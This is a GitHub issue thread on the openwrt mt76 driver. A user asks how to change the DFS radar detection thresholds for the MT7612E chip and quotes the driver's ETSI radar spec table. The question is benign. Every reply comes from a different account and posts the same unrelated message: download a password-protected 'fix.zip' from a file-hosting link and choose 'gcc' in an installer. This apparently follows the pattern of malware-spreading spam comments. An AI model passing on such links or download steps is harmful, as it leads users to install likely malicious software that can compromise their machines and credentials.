openwrt/mt76 #910: MT7612E: how to change radar interference threshold value

Lanhong1980930, 2024-08-26:
I use the openwrt driver, but when test DFS for CE certification, need modify the interference  threshold value. So how to change this value？
mt76x02_dfs.c
`
static const struct mt76x02_radar_specs etsi_radar_specs[] = {
        /* 20MHz */
        RADAR_SPEC(0, 8, 2, 15, 106, 150, 10, 4900, 100096, 10, 0,
                   0x7fffffff, 0x155cc0, 0x19cc),
        RADAR_SPEC(0, 40, 4, 59, 96, 380, 150, 4900, 100096, 40, 0,
                   0x7fffffff, 0x155cc0, 0x19cc),
        RADAR_SPEC(3, 60, 20, 46, 300, 640, 80, 4900, 10100, 80, 0,
                   0x7fffffff, 0x155cc0, 0x19dd),
        RADAR_SPEC(8, 8, 2, 9, 106, 150, 32, 4900, 296704, 32, 0,
                   0x7fffffff, 0x2191c0, 0x15cc),
        /* 40MHz */
        RADAR_SPEC(0, 8, 2, 15, 106, 150, 10, 4900, 100096, 10, 0,
                   0x7fffffff, 0x155cc0, 0x19cc),
        RADAR_SPEC(0, 40, 4, 59, 96, 380, 150, 4900, 100096, 40, 0,
                   0x7fffffff, 0x155cc0, 0x19cc),
        RADAR_SPEC(3, 60, 20, 46, 300, 640, 80, 4900, 10100, 80, 0,
                   0x7fffffff, 0x155cc0, 0x19dd),
        RADAR_SPEC(8, 8, 2, 9, 106, 150, 32, 4900, 296704, 32, 0,
                   0x7fffffff, 0x2191c0, 0x15cc),
        /* 80MHz */
        RADAR_SPEC(0, 8, 2, 15, 106, 150, 10, 4900, 100096, 10, 0,
                   0x7fffffff, 0x155cc0, 0x19cc),
        RADAR_SPEC(0, 40, 4, 59, 96, 380, 150, 4900, 100096, 40, 0,
                   0x7fffffff, 0x155cc0, 0x19cc),
        RADAR_SPEC(3, 60, 20, 46, 300, 640, 80, 4900, 10100, 80, 0,
                   0x7fffffff, 0x155cc0, 0x19dd),
        RADAR_SPEC(8, 8, 2, 9, 106, 150, 32, 4900, 296704, 32, 0,
                   0x7fffffff, 0x2191c0, 0x15cc)
};
`

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ZiQiangZhou, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

abdulhkeemGit, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."